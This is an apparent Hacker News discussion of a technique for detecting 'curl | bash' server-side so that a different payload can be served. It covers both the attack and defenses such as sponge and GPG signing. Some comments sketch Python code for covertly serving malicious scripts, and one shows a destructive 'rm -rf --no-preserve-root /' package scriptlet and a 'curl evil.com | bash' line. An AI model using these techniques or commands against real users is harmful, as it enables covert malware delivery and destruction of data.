Detecting the use of "curl | bash" server-side (idontplaydarts.com)
500 points by rubyn00bie 6 months ago | 145 comments



The sleep cleverness is excessive though - what you really want to know is if the script you're returning is being executed as it's sent. If it is, then you can be pretty confident that a human isn't reading it line by line.

1. Send your response with Transfer-Encoding: chunked and TCP_NODELAY set

2. Send the first command as

    curl www.example.com/$unique_id
Then the server waits before sending the next command - if it gets the ping from the script, we know that whatever is executing the script is running the commands as they're sent, and is therefore unlikely to be read by a human before the next command runs. If it doesn't ping within a second or so, proceed with the innocent payload.

For extra evil deniability, structure your malicious payload as a substring of a plausibly valid sequence of commands - then simply hang the socket partway through. Future investigation will make it look like a network issue.
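The flow above can be sketched in a few lines of Python. This is a toy model of the server-side decision only (the payload strings, the endpoint name, and the one-second window are all invented for illustration, and the actual chunked HTTP plumbing is omitted):

```python
import threading
import time

BENIGN = "echo 'installing...'\n"
EVIL = "echo 'installing...'  # imagine something nasty here\n"

class PingTracker:
    """Records phone-home pings keyed by the unique id in the first chunk."""
    def __init__(self):
        self._seen = set()
        self._lock = threading.Lock()

    def ping(self, unique_id):
        with self._lock:
            self._seen.add(unique_id)

    def wait_for_ping(self, unique_id, timeout=1.0):
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            with self._lock:
                if unique_id in self._seen:
                    return True
            time.sleep(0.01)
        return False

def serve_script(tracker, unique_id):
    # Chunk 1: a command that phones home the moment it is executed.
    first_chunk = f"curl -s https://www.example.com/{unique_id}\n"
    # If the ping arrives while we are still holding the connection open,
    # the client is executing as it downloads; no human is reading it.
    executing_live = tracker.wait_for_ping(unique_id)
    second_chunk = EVIL if executing_live else BENIGN
    return first_chunk + second_chunk
```

The decision hinges entirely on whether the callback races the rest of the download; an inspector who saves the script to disk never triggers the ping in time and only ever sees the benign version.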


You could even get more clever with this: drop the unique_id and just match up the remote host IP. You could probably even disguise the command as something like a "network connectivity test" in the script.

    # Check network connectivity so we can continue the install
    if ! curl --fail www.example.com; then exit; fi
Of course, what's actually happening is that we've just signaled the server to serve our malicious code.


Remote host IP isn't ideal because of NAT (a request from another host on the network would expose your malfeasance), or because your target may be using something like Tor (the two requests might have differing remote IPs). But there are a bunch of tricks to get unique info out of a network request whose parameters you control. Presumably there aren't that many concurrent invocations of your script, so only a few bits of entropy are actually required. The best way is probably to have a bunch of domains and make it look like they're various mirrors you're downloading binaries from - then it's not suspicious that the domain changes across machines or requests.
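A quick sketch of that mirror trick (the hostnames are hypothetical, and a real attacker would pick the pool size to match expected concurrency):

```python
import hashlib

# Hypothetical "mirror" pool: the hostname the installer downloads from
# leaks a couple of bits - enough to match up a handful of concurrent runs.
MIRRORS = ["dl1.example.net", "files.example.org",
           "mirror.example.io", "cdn.example.co"]

def pick_mirror(session_token: str) -> str:
    # Deterministic choice derived from the per-download token; to anyone
    # reading the script it just looks like ordinary mirror selection.
    digest = hashlib.sha256(session_token.encode()).digest()
    return MIRRORS[digest[0] % len(MIRRORS)]

def matching_tokens(hostname: str, live_tokens: list) -> list:
    # Server side: which of the currently-open downloads would have been
    # directed at this mirror?
    return [t for t in live_tokens if pick_mirror(t) == hostname]
```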


If binaries are being downloaded, then the dynamically generated malicious script could pretend it's a checksum when really it's a unique tracking URL.

    curl www.example.com/downloads/fooprogram/builds/D41D8CD98F00B204E9800998ECF8427E.tgz
If the time between the script being downloaded and that file being requested is large, serve the clean copy, else download the malicious binary.
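That could look something like this (the five-second window and the filenames are assumptions; the "checksum" is just a random per-download token formatted to look like an MD5 digest):

```python
import secrets
import time

DOWNLOAD_WINDOW = 5.0  # assumed: seconds between script fetch and binary fetch

# fake "checksum" -> time the install script embedding it was generated
issued = {}

def make_tracking_checksum() -> str:
    # 32 hex chars: indistinguishable at a glance from an MD5 checksum.
    token = secrets.token_hex(16).upper()
    issued[token] = time.monotonic()
    return token

def payload_for(token: str) -> str:
    t0 = issued.get(token)
    if t0 is not None and time.monotonic() - t0 < DOWNLOAD_WINDOW:
        return "malicious.tgz"   # script is executing as it streams
    return "clean.tgz"           # probably a human re-fetching later
```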


Well it's okay to not infect every target. In fact, if you are being malicious, it would be better to only infect some targets so as to muddy the waters when someone is trying to investigate your actions after the fact.

You can claim that you were MITM'd and point to the non-infectious cases as evidence that you always send a good payload.


That's mistaken because:

  bash -c "`echo echo hi`"
Note that `echo echo hi` is fully read, and then (and only then) passed to bash.

ditto for

  bash -c "`curl <your url>`"
The curl command isn't detectable as an evaluation because it's fully spliced into the string, then sent to bash. It's easy to imagine setting up a `curl <url> | sponge | bash` middleman, too.

It is impossible in general to know what the downstream user is going to do with the bytes you send. Bash merely happens not to buffer its input - it would be entirely valid for bash to read in a buffered mode that waits for EOF before interpreting.


Which part is mistaken?

You're of course correct that the general problem is unsolvable - but the goal is to opportunistically infect people who directly paste the "curl example.com/setup | bash" that's helpfully provided in your getting started guide, without serving an obviously malicious payload to someone who could be inspecting it.


Sorry, 2AM. You're right of course.

I think the real message is that this is a new class of timing attack, and that it should be treated as such. E.g. curl itself needs to be updated to buffer its own output.


Or perhaps people shouldn't curl | bash? I don't want curl to buffer all output, I use it on devices with little RAM and do stream processing.


I disagree. Maybe a new tool that downloads and then runs a script from the interwebs needs to be written, but curl itself does one job and does it well.

I.e., curl is a *nix tool.


> Maybe a new tool that downloads and then runs a script from the interwebs needs to be written

What you're describing there is a package manager. What we don't need is a tool for running any random script from the wider internet.


Yet Another Package Manager :) Seriously - you're right, but people use curl | bash because it's super simple/fast and usually just works. Package managers can be an intimidating mess; even the choices we have in package managers confound things these days - did I install that with apt? snap? npm? pip? aw, crap, that program I just installed with pip isn't working because I'd already installed a version with apt and some of its configuration isn't compatible!!!

It's a mess. I really like snaps, but I hesitate for this reason - safer to default to apt on my ubuntu machine.

[edit] by safer I meant 'less likely for me to get confused and so screw up something', not meant as a security comment.


Isn't that tool what we call a "user"?

jchook 6 months ago [flagged]

Sick burn.


Hm. I tried and it does not seem to work. You can view my attempt at https://github.com/sethgrid/exploit. Chances are that I am ignorant of something. If someone knows what I am doing wrong, please let me know!

The code starts to send chunked data and polls for a return curl call from the downloaded script. If the script's curl call calls home, the download will chunk out "bad" bash.

What I see happening is the downloaded script does not fully run until fully downloaded.


Help from /r/golang: I needed to still fill the TCP buffer!
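The fix, sketched in Python rather than Go (the 64 KiB figure is an assumption about the kernel's socket send buffer, not a universal constant): small writes can sit in the buffer instead of going out on the wire, so pad the first chunk past the buffer size.

```python
def pad_chunk(command: str, target_size: int = 64 * 1024) -> str:
    # Pad the command out with a giant bash comment so the write exceeds
    # the kernel's send buffer and is flushed to the client immediately.
    # '#' bytes are invisible to bash but still fill the socket.
    padding = "#" * max(0, target_size - len(command) - 1)
    return command + padding + "\n"
```

Without the padding, the server's "first chunk" may never reach the client before the server starts waiting for the callback, which is exactly the symptom described above.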


This would reveal your intent to a human reader. I think the author of the article was trying to avoid doing that.


Fooling a human with bash is less difficult than you might imagine. I am fooled by bash code at least half the time I interact with a shell script I didn't write myself. A misleading comment plus an innocuous looking URL, coupled with the fact that an installation script can be expected to download files from the internet in order to install them would make this slip past nearly any reviewer.


You could encode something in the url using homographs.


On the evading detection side, one other simple way to avoid this is to add sponge[0] between curl and bash in the pipeline, i.e. curl ... | sponge | bash. sponge consumes all input until EOF before outputting anything, stopping bash from executing a partially downloaded script.

[0] https://linux.die.net/man/1/sponge
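sponge's core behavior is simple enough to sketch in a few lines of Python (a toy stand-in, not the real moreutils implementation, which also handles writing back to the same file it reads from):

```python
import sys

def sponge(infile, outfile):
    # Soak up ALL input until EOF before emitting a single byte, so a
    # downstream `bash` never sees a partially delivered script.
    data = infile.read()
    outfile.write(data)
    outfile.flush()

if __name__ == "__main__":
    sponge(sys.stdin, sys.stdout)
```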


Just curl it to tee or redirect to a file and you know it won't change before you execute the script file.

There's nothing stopping somebody from even more trivially just sending each IP a benign script once (per curl user agent) and a malicious script the second time. Putting it in a file and executing the file brings it entirely into your domain of control.


If you're on a Mac or a system that doesn't have sponge installed by default, install the moreutils package to get it.

https://joeyh.name/code/moreutils/ https://rentes.github.io/unix/utilities/2015/07/27/moreutils...


Thanks, this is helpful!


So yes, curl bash can be dangerous. But it's just so darn convenient. And when it's coming from a very prominent trusted source like Get Pip or Amazon AWS it's hard not to just go with it.

Surely there's some compromise middle ground? Let me download "safe-curl-bash" (scb) that only runs a script if it's trusted in some manner? Maybe the checksum matches from a crowdsourced database.

"Sorry only 9 people have declared this script valid and your threshold is 100. Here's a cat of the script and we will ask you if it looks valid or not or don't know."

I also think it's a bit more realistic than the, "anyone who does this should be reading the script first to check that it's safe." Yes, and I check the passenger jet for flaws before I board, too!

Just spitballing.
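Spitballing along: here's what the core of that hypothetical "safe-curl-bash" might look like. The trust database and vouch counts are entirely made up - stand-ins for a crowdsourced service that doesn't exist:

```python
import hashlib

# Hypothetical crowdsourced trust database: sha256 of a script -> number
# of people who have declared it valid.
TRUST_DB = {
    hashlib.sha256(b"echo 'known good installer'\n").hexdigest(): 150,
}

def scb_decision(script: bytes, threshold: int = 100) -> str:
    vouches = TRUST_DB.get(hashlib.sha256(script).hexdigest(), 0)
    if vouches >= threshold:
        return "run"
    # "Sorry, only N people have declared this script valid": show the
    # script and ask the user instead of running it blind.
    return "prompt"
```

Note that hashing the exact bytes also happens to defeat the article's trick: the script is fully downloaded and fingerprinted before anything executes.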


> Yes, and I check the passenger jet for flaws before I board, too!

There is an entire infrastructure of people and processes in place to make sure that you don't have to check your passenger jet for flaws to be reasonably sure it's safe. No such infrastructure exists to protect you from the consequences of curl-bashing software off some random Web site.


If you're installing software off some random website then you're already hosed no matter what the install process looks like.

Say you already trust the website you're downloading from: is there an increased security risk in doing curl | bash compared to rpm --import https://example.com/RPM-GPG-EXAMPLE && yum install https://example.com/example.rpm?

No matter what, you're putting 100% faith in the server and the TLS connection. There are a lot of reasons to prefer packages, but I don't think security is one of them.


Security is one of them.

When RPM-GPG-EXAMPLE and example.rpm both come from https://example.com it's less clear. But when example.rpm is coming from a mirror repository, or being emailed around (yes, this happens), package signing asserts that example.rpm was signed by the key in RPM-GPG-EXAMPLE, which has a strong (but not bullet-proof) connection to having been built by example.com.

From that example, we can see that package signing also protects against someone who's able to break into the main example.com webserver but not example.com's build system. If the attackers did not get into the build system and example.rpm has a valid signature, then despite the webserver being broken into, the rpm file can still be trusted - assuming the webserver did not have a copy of the private key used for build signing. And if we loaded https://example.com/RPM-GPG-EXAMPLE before the webserver was broken into, and a malicious RPM-GPG-EXAMPLE and example.rpm were later uploaded, the change would be noticed. (Examining changes to RPM-GPG-EXAMPLE is, unfortunately, left to the reader as an exercise.)

Still, while it's true that loading the file from https://example.com/RPM-GPG-EXAMPLE relies on TLS, there are methods available to confirm that the file's contents are valid that don't rely on TLS, if the security folk at example.com are doing their job.

Finally, TLS is not an all or nothing game. Or rather, the certificate used to sign the https connection does not have to be blindly trusted, and in the case of sketchy root certificates, even if https://example.com loads fine in a web browser, it does not mean it should necessarily be trusted. Certificate Transparency (eg crt.sh) is a proper lever when working with example.com.

Security is complicated and there are no silver bullets.

`curl | sudo bash` is batshit though.


Say I already trust packages.redhat.com and install rpms regularly from it. I likely already have trusted their key.

Now packages.redhat.com gets hacked and the attacker replaces the RPMs. Unless the hacker also stole the private key used for signing packages, I will get a warning/error while installing the rpms (which I admit most users will ignore) - but a curl|bash from the same host defeats the point of package signing entirely.


Yes that's fair. My point is that most people using these scripts have nowhere near the expertise to be able to evaluate their safety.


Who are these "most people"? I've never seen curl | bash outside of developer circles. "Most" people install things directly from the app store, or use web apps.


Good use case for IPFS. You could curl a hash and check that hash against signatures commited to a blockchain. If the set of signatures exist that you trust, then it's golden, if not, no exec.


If by "signatures committed to blockchain" you mean git with a GPG signed tip/tag, then yes, sure, blockchain.

If you mean that other thing, no.


The only difference is the consensus algorithm. A git repo is proof of authority, or proof of access rights.


> when it's coming from a very prominent trusted source like for Get Pip or Amazon AWS

Not a random website, and they do have an infrastructure.


> when it's coming from a very prominent trusted source like...Amazon AWS.

Be very careful here. https://installation.s3.amazonaws.com/setup.sh looks like a legit URL, but it's just some guy with an S3 bucket named "installation".


Security and convenience are almost always a difficult tradeoff. In the case of curl'ing scripts from trusted websites, what is the benefit for the average lazy user? Are you using an OS that doesn't have a signed package with the same library/program?

It's not trust now that you need to worry about. It's trust later, when curl-bash is part of an automated pipeline that no one pays attention to.


"Lazy" isn't a bad thing. When I see a curl-bash command from a reputable site, I'm not about to waste my time evaluating it. Consider step one to three from this site https://docs.aws.amazon.com/AmazonECS/latest/developerguide/... or get-pip instructions from this one: https://packaging.python.org/tutorials/installing-packages/

But I agree with your sentiment. If the exact same step was to `apt install ecs-cli` I would just do that and not feel any inconvenience about it.


Your solution depends on third parties checking the script or going based on some knowledge of "trusted sources." That has nothing to do with this hack, which exploits those who are "verifying" the script themselves before executing it.

The simple solution here is not to use curl/execute with a pipe. Just wget to save the file and check it locally (rather than through a browser) before executing.


Preventing the bad guy from "validating" his own script a million times is difficult. At the end of the day, I think security basically has to come from "I trust the website that I'm on."


I think the Arch User Repository does this correctly by asking, "do you want to edit the PKGBUILD?" You can just press n to accept the defaults, or y to take a look under the hood and make edits before continuing.


Neat! But it's not obviously a bad idea. You have a TLS connection with the site you're downloading from. `curl | bash` is no worse than downloading a .dmg or .deb from the same server would be.


> You have a TLS connection with the site you're downloading from. `curl | bash` is no worse than downloading a .dmg or .deb from the same server would be.

This site's argument is that the software publisher can selectively attack users during a live software install, in a way that they don't stand a chance of detecting by inspection (or of having proof of after the fact).


I mean, I guess I see them making a three-stage argument:

1) Distributing software via bash script is a bad idea

2) Sensible people review the bash scripts they downloaded before running them

3) But haha! Here is a clever trick that evades that review.

And I'm not persuaded by 3) being interesting, because I already rejected 1) and 2), and I consider 3) to just be proving my point: you (for all values of you!) are not competent to perform a very brief but somehow thorough security review of a shell script that probably has further dependencies you aren't even looking at. The actual reasoning to apply when deciding to install software this (or any) way is purely "Do I trust the entity I have this TLS connection open with to run code on my machine?"


I agree with im3w1l's point: if everyone runs the same install script, it's a lot riskier for the publisher to attack everywhere. If people run individualized scripts, it's a lot less risky.

I think there's a difference between trusting an organization's code that is published to the general public, and trusting an organization to send you arbitrary code in a specific moment. Only software distribution methods can enforce this kind of distinction, and curl | bash by itself doesn't, particularly in light of the article's technique.

I tried to discuss this distinction in some of my reproducible builds talks. There's a difference between trusting Debian to publish safe OS packages, and trusting Debian to send you a safe package when you run a package manager if the package could easily be different every time. This is particularly so when someone may be able to compromise the software publisher's infrastructure, or when a government may be able to compel the software publisher to attack one user but not other users.

Instead of your (1) and (2) above, how about this?

1) Distributing software via a method that can single out particular users and groups to receive distinctive versions is a bad idea: it increases the chance that some users will actually be attacked via the software publication system.

2) We might think that curl | bash isn't particularly egregious this way, because there are various ways that publishers might get caught selectively providing malicious versions. This is especially so because the publishers can't tell whether a curl connection is going to run the installer or simply save it to disk. That makes the publishers (or other people who could cause this attack to happen) less likely to do it.

3) But haha! Here is a clever trick that restores the publishers' ability to distinguish between running and saving the installer, and in turn breaks the most plausible ways that publishers could get caught doing this.

Edit: Elsewhere in this thread you suggested that the likeliest alternative is something like

curl https://somesite.com/apt.key | sudo apt-key add - && sudo apt-get update && sudo apt-get install some-software

I think I'd agree that this has some of the same problems, although it might have some advantages because of the potential decoupling between the distribution of the signing key and the distribution of the signed package. As another commenter pointed out, you could try to use a different channel to get or verify the key, and some users actually do; also, you'll have a saved copy of the key afterward.


I agree that the distributor having control over offering different artifacts to different individuals is very risky.

I was assuming that the sites that you might `curl | bash` from are third-party sites (i.e. not your Linux distribution) that you don't have an existing trust relationship with, which makes it impossible to avoid this capability. That's the situation people use curl | bash in.

So I think this ability to individualize artifacts would still be present if we were receiving a .deb or apt key instead from that site.

> you'll have a saved copy of the key afterward

Yes, though since dpkg post-install scripts can modify arbitrary files (right?), you can't trust that any files on your disk are the ones that existed before the compromise. So couldn't the malicious key verify the malicious package, which then overwrites the copy of the package and key on-disk with the good versions that were given to everyone else?


> So I think this ability to individualize artifacts would still be present if we were receiving a .deb or apt key instead from that site.

I guess we need some other infrastructure or social practice on top in order to compare what different people see, and/or allow the distributor to commit to particular versions. (Then having the distributor not know whether someone is blindly installing a particular file without verification is necessary, but not sufficient, to deter this kind of attack.)


> This is particularly so when someone may be able to compromise the software publisher's infrastructure

Indeed. While this particular venue wouldn't have worked for:

https://wiki.gentoo.org/wiki/Project:Infrastructure/Incident...

(a compromise of github itself would be needed) - it's easy to imagine one of the many mirrors of Debian to suffer from compromise. But as they just push signed debs, the damage would be limited (not trivial, there could conceivably be bugs in apt/dpkg/gnupg etc).


If you are running the same script as everyone else, then there is a good chance someone else will notice if something is off. If everyone is potentially given their own personalized script, this safety-in-numbers strategy doesn't work.

If you know you are running the standard scripts that everyone runs, it also makes a post-breach investigation easier. You know the exact scripts you ran, as opposed to knowing "well, I curl | bashed from these sites, so one of them might be bad".


There's nothing stopping people from being served different content with packages. Hell, n users could receive n different packages which all pass the GPG check. And since you're getting your checksum from the same site it would look like it had the right checksum too. You would have to find other people you trust to compare it to but since everything appears to be above board why would you even think to do that?

Either you trust the entity you're downloading software from or you don't.


Linux/BSD distribution mirrors don't control the package signing keys, maintainers do. Similarly, Google doesn't possess the ability to push out updates for third-party apps, without fundamentally redesigning the OS with a platform update, because the signing keys are owned by the app developers, and the existing OS rejects updates signed with different keys. In both of these situations, the key owners lack the ability to selectively push out signed updates, unless they also control the distribution infrastructure.


The argument is predicated on the assumption that some subset of people are checking the installer before running it, whether that installer is a shell script or a binary package.

With the binary packages you don’t have any way to tell if the consumer is going to inspect it or not, so even if you send the malicious code to only a subset of people, there is a risk of detection.

The technique in the post allows you to distribute the malicious code only to people who aren’t inspecting it with a much higher success rate.

Personally I’m dubious that anyone is inspecting any installers with enough expertise and scrutiny to protect the rest of us, so the differences between the install methods in this regard are negligible.


>in a way that they don't stand a chance of detecting by inspection (or of having proof of after the fact)

What do you mean? They could `tee` curl output to a file (or elsewhere, for archives). They could also suspend passing the output to bash until they've verified the output (perhaps they would run a hash function and compare the result).


Then that wouldn't be 'curl | bash'.


curl | ... | bash


The point of the article is apparently that the server can distinguish "curl | ... | bash" from "curl | bash".


Alice and Bob are both installing something on their computers. It is available as both a .deb and via "curl | bash". It is not malicious...but it does turn out to have a serious bug.

They both install, and both hit the bug and find that it has completely and utterly broken their network configurations bad enough that they have no network access at all.

Alice installed via the .deb. She can look at the scripts in the .deb and see what it was messing with, which gives her a big head start on figuring out how to fix it at least enough to connect to the network backup server and fully restore her network configuration.

Bob installed via "curl | bash". Bob is now left using find to look for recently changed configuration files, and paging through the out of date O'Reilly books he has from the old days when programmers owned physical books, trying to remember enough about network configuration to recognize what is wrong.

Trustworthy sites do not serve you malicious code. They often will, however, serve you buggy code.


Or Bob just curls the file again and reads it?


How does Bob curl the file again without network access? :-)

Remember, I said that the bug in the file broke the network configuration so that Alice and Bob lost all network access.


From another computer? This situation sounds so contrived as-is. Don't tell me they also can't use another system?


The difference is that you can inspect it before you run it if you download it. If you pipe it into bash you don’t know what you’re getting, even if you previously inspected the data provided by that URL.


I don't feel the need to review the source code for every install script I run.

I don't read the source code for almost any of the code on my machine today. In most cases where I see `curl | bash`, I'd probably already be screwed even if I review it. Most install scripts end up doing "hit website, install thing" anyways - am I reviewing the second-stage install script also?


That’s fair. It’s probably not an important difference.


That's a way in which "curl | bash" distributed software is better than .deb/.dmg distributed software, right? Because you have the potential to inspect the script first, if you have some kind of ridiculous confidence in your ability to perform security review of an entire software product in the moments before you decide to install it.

But it's never presented in that way, as a feature. It's presented as a terrible way to distribute software.


It doesn't take ridiculous confidence to analyze shell scripts. In the hundreds of scripts I have read, few were more than 100 lines long. It shouldn't take more than 60 seconds (probably 30 or less) to mentally build a list of all possible operations a short script can perform. Bourne shell scripts don't have much room to hide surprising behavior, and when they do, it immediately stands out. If they are permanently installed, and invoked later by other parts of the system, then they may need more probing, but we're talking about installation scripts.

.deb and .dmg can be easily extracted. The former is just an `ar` archive containing tarballs, which you can (and should) extract to read the install scripts. (.dmg specifics escape me, since I only dealt with them one time, years ago.)

Binary code isn't inscrutable. Some good tools for this are, among many, many more, IDA, Hopper, and radare2. How long this takes depends on what your goals are, how comprehensive you are, and the program complexity. I don't think I've yet spent years on one project, fortunately, but the months-long efforts, for undoing some once-prominent copyright protection systems, were pretty brutal. Smaller programs have taken me just several hours to appropriately examine.


If inspecting a script were a reliable way to catch evil software, bugs would not exist.


deb/rpm is better because it's usually signed by maintainer with GPG keys. I think that it's harder to steal keys from maintainer than to infiltrate web server.


We came up with a way to do gpg verified curl | bash for ZeroTier. It still works without gpg too. Scroll down to Linux.

https://zerotier.com/download.shtml


Quote (wrapped to a narrow width, for others on mobile):

  curl -s 'https://pgp.mit.edu/pks/lookup?op=get&search=0x1657198823E52A61' \
    | gpg --import \
    && if z=$(curl -s 'https://install.zerotier.com/' | gpg); then
         echo "$z" | sudo bash
       fi
It's interesting - it imports a given gpg key from a keyserver, then grabs a gpg-armored text file with a bash header, the gpg header wrapped in a here-document:

  #!/bin/bash
  <<ENDOFSIGSTART=
  -----BEGIN PGP SIGNED MESSAGE-----
  Hash: SHA256

  ENDOFSIGSTART=
  
I'm unsure, but I think you could just stick your malicious code before the signature?

  #!/bin/bash
  sudo much_evil
  <<ENDOFSIGSTART=
  -----BEGIN PGP SIGNED MESSAGE-----
  Hash: SHA256

  ENDOFSIGSTART=
So it really isn't any better, as far as I can tell. There's also a trade-off between scripts that can be typed (curl https://i.com.com) and ones that need copy-pasting - as copy-pasting also isn't safe - even if that's a somewhat different attack vector (compromising the web site, altering js depending on visitor).


Putting malicious code before the signature doesn't work because gpg chops it out. It only outputs the verified part.

It is definitely a kludge though.


So the shebang is redundant, except for testing during development? [ed: and for allowing the daring to just do curl|bash, I guess]


It's not strictly necessary, no.


They could be. dpkg and rpm will still install unsigned packages by default. That's one problem.

Another problem is that people are being trained to get software [directly] from software developers.


For the most part you receive the GPG keys over the same TLS connection, though.


Not sure what you mean. I don’t think apt-get install foo involves transferring GPG keys.


We're comparing the security properties of

`curl https://somesite.com/foo.sh | bash`

with

`curl https://somesite.com/foo.deb`

and

`curl https://somesite.com/apt.key | sudo apt-key add - && sudo apt-get update && sudo apt-get install some-software`

I don't think there are very meaningful differences in the security properties -- I don't think it's more difficult to become compromised by one than by one of the others.


No, you're deliberately choosing a bad way to get a key to try to prove your point. You shouldn't be fetching a key from the site that might be compromised.


> You shouldn't be fetching a key from the site that might be compromised.

You shouldn't, but people do, and are being directed to do so increasingly as Linux becomes more popular. Software developers want to be software publishers so bad that they're just going to keep pushing, and therein lies the risk: If people get the impression that packages are somehow more secure than shell scripts, then these kinds of attacks will simply become more prevalent.

To you it's obvious that packages aren't more secure, it's how you get them that makes their normal use more secure. That's apparently too subtle a point for even big companies like Microsoft.

https://pydio.com/en/docs/v8/ed-debianubuntu-systems

https://docs.docker.com/install/linux/docker-ce/ubuntu/#inst...

https://www.spotify.com/uk/download/linux/

https://www.elastic.co/guide/en/apm/server/current/setup-rep...

https://ring.cx/en/download/gnu-linux

http://docs.grafana.org/installation/debian/

https://support.plex.tv/articles/235974187-enable-repository...

https://stack-of-tasks.github.io/pinocchio/download.html

http://download.mantidproject.org/ubuntu.html

https://docs.microsoft.com/en-us/cli/azure/install-azure-cli... (!!!)


I've always said the same, but what's the solution here?


There's three that I can see:

1. Walled Garden: Developers don't self-publish. Call it an app store, call it everything-in-apt.

2. Encapsulate everything so that developers can't do anything. Don't use anything unless it comes in a docker instance. Or a FreeBSD jail. Or something else. Qubes maybe.

3. Smarter users. Good luck with that one.


No, there's no effective difference between those examples, apart from maybe post mortem analysis. It's also a poor method of key discovery, as hueving said.


GPG's trust model is outside the transport layer, via signatures.

Not foolproof, but it answers your objection.


That's an antipattern, should use keyservers.


Where do you get the keyserver ID? From the website? You're back to square one, because anyone can upload anything to a keyserver. If they can modify the website (change files, etc) they can also change the keyserver ID they're telling people to use.

The "antipattern" is letting/expecting software developers also be software publishers.


This is a good point, which should be brought up more. Although you probably meant key id or key fingerprint, not keyserver ID, which would imply something else.

You're supposed to do additional verification of PGP keys, either through attending key signing parties (who does that in 2018?), checking the signatures of people you already trust, or comparing as much out-of-band information as you can.

It's not terribly hard to create a plausibly trusted keyring from scratch that depends on only 1 of 3 websites being legitimate. For example:

    kernel.org: ABAF11C65A2970B130ABE3C479BE3E4300411886 Linus Torvalds <torvalds@kernel.org>
    marc.info:  647F28654894E3BD457199BE38DBBDC86092693E Greg Kroah-Hartman <gregkh@kernel.org>
    thunk.org:  3AB057B7E78D945C8C5591FBD36F769BC11804F0 Theodore Ts'o <tytso@mit.edu>
All keys are cross-signed, as shown by gpg2 --list-signatures.

If this sounds like a pain in the ass, it's because it is, and GPG could be so much better.

Ironically, if you can't acquire the developer's public signing key, it might be best to install software directly from their website, if no trusted repositories are available. If you can acquire their signing key, it's probably best to not install software directly from their website, in order to avoid selective distribution attacks. Sort of unintuitive.


Public keyservers are well-known, and in a different security domain than the download server. Without breaking in, a rogue party can't delete or replace keys from the keyservers.


Aren't keyserver lookups usually keyed off a 32-bit key ID though? (Whose space isn't big enough to avoid someone brute-force generating a key with a certain key ID s.t. you think you got the right key.) You're supposed to check the fingerprint, but you need to get the fingerprint, and for that you need a secure channel, and you're right back to square one.

For that matter, where did you get the key ID?


Still not safe.

Verify key signatures.

And I really wish GPG had a negative trust signature.


Yeah, if there are signatures then it doesn't matter. But often both are a miss.

Eg the key from https://docs.docker.com/install/linux/docker-ce/ubuntu/#set-... doesn't have signatures, and isn't on the keyservers.

Of course an unsigned key missing from the keyservers still has the advantage that on subsequent installs/updates, the previously downloaded key persists. And you can keep the initially downloaded key in your CI configs.


Verify it against what?


See what keys have signed a given key. See Debian maintainer keys as an example.

This is ... not everything that it could be, and is approaching 30 years old, technology built for a vastly different world.

But this is the basis of the GPG / PGP Web of Trust.

https://en.wikipedia.org/wiki/Web_of_trust

http://www.pgpi.org/doc/pgpintro/

http://www.rubin.ch/pgp/weboftrust.en.html

(I've addressed this point ... a distressing number of times on HN: https://hn.algolia.com/?query=dredmorbius%20web%20of%20trust... )


Have you contacted maintainers if they're willing to do this? Is there a way to configure apt to verify chain of trust?


Downloading a .dmg is not running any code, which makes it 100% better at preventing malware installation than curl | bash.


dpkg/packages have sanity checks to make sure that files aren't being overwritten, and things are generally in a sane state.

curl|bash involves no checks, and no system integration whatsoever.


dpkg doesn't stop you overwriting system files in a post-install shell script, as far as I know? Which is the way that a malicious package would choose to do it. I don't think dpkg performs any meaningful security review in the way you describe.


Would you like me to craft you a .deb/.rpm which totally trashes your system? Packages can and very often do leverage the ability to run arbitrary scripts but nothing says I can't do serious damage even without that.


    %post
    rm -rf --no-preserve-root / 2>&1 > /dev/null
Oh, yeah - good luck getting the average layperson or even many sysadmins to inspect this - because very few people actually know how to review scriptlets in an RPM (rpm -qp --scripts package.rpm, isn't this nice and obvious?). Nobody bothers for packages distributed via yum repositories either, because manually downloading packages to review them defeats the purpose, right?

Yeah, everything is vulnerable at the end of the day - but at least with packages one is less likely to get seriously messed with, just not impervious to it.


Obviously it's possible, but if somebody is being malicious all bets are off.

deb is still a more structured format that is less likely to result in accidental collateral damage.


You could just have the script detect that its stdin is a pipe. E.g., Linux specific:

  $ echo 'ls -l /proc/$$/fd/0' | bash
  lr-x------ 1 kaz kaz 64 Jul 28 21:03 /proc/23814/fd/0 -> pipe:[4307360]
Here, our script consists of the ls command; it shows that when we pipe it to bash, it finds fd0 to be a pipe.

We can make some code conditional on this to produce a "don't run this script from a pipe" diagnostic.

This is superior to the dodgy, delay-based server side detection because it is reliable.

Also, it still works when someone does this:

  $ curl <url> > file
  $ cat file | bash
Of course, no protection for

  $ bash file


This logic would be detectable to a user who reads the script. The goal here is to trick users who first inspect the script and then `curl | bash`


If you downloaded the script to inspect it, why would you not just run the script that you downloaded?


That's the point. It's also possible that the remote script has been altered in the meantime. Therefore it's never advisable to download the script again after inspection.


    curl evil.com
    curl evil.com | bash


    wget evil.com
    less evil.sh
    bash evil.sh


There's more than one user. You don't want any of them to find the malicious code.


Web browser.


Half the problem with `curl | bash` installation is not related to whether or not you trust what you're downloading...

The more important reason why it is a _horrible_ _stupid_ mechanism for software installation is that it is not _repeatable_.

It is well understood that casual .deb .rpm usage requires an equivalent level of trust as downloading anything else off the internet... but they have the added advantage of being _consistent_ _repeatable_ and _mirrorable_... I can copy the entire repository of any version of debian I want to my local file server, and use that to spin up however much infrastructure I want. And the only person I need to rely on after I have fetched the initial packages is myself.


Plenty of those scripts simply detect your operating system and then interact with the system package manager (adding a new repository, updating the package index, then asking the package manager to install it).
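A sketch of that detection step (the package name `foobar` is a placeholder, and the function only prints the command it would run):

```shell
#!/bin/sh
# Detect the distribution family by its release file, then hand off to
# the native package manager. Echoes the command instead of running it.
detect_and_install() {
  if [ -f /etc/debian_version ]; then
    echo "apt-get install -y foobar"
  elif [ -f /etc/redhat-release ]; then
    echo "yum install -y foobar"
  else
    echo "unsupported distribution" >&2
    return 1
  fi
}
```

Real vendor scripts additionally add their repository and signing key before the install step.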


I would far prefer that software projects assumed competence in the installer's knowledge of their system's package manager and just listed the specifics... honestly how hard is it to just say "here is our $gpg key", "here is our $apt_repo_url", "the package name is $foobar"? And let competent system admins take it from there. Most of the time you end up de-composing the scripts into ansible/$sys_automation_tool_of_the_week anyhow.


Because your $apt_repo_url is useless to a yum user.

The package management community needs to stop balkanizing.

How else do you propose releasing software to all Unix-like OSes without learning a half dozen package manager formats and quirks? Only other choice is a container.


I wish there was a standard way to check a checksum, so that download instructions could just include that in the snippet to copy paste.

I wrote a tool that could be used like that, but it's useless if it's not ubiquitous (https://github.com/mmikulicic/runck)


I've got a similar python script in my collection of scripts:

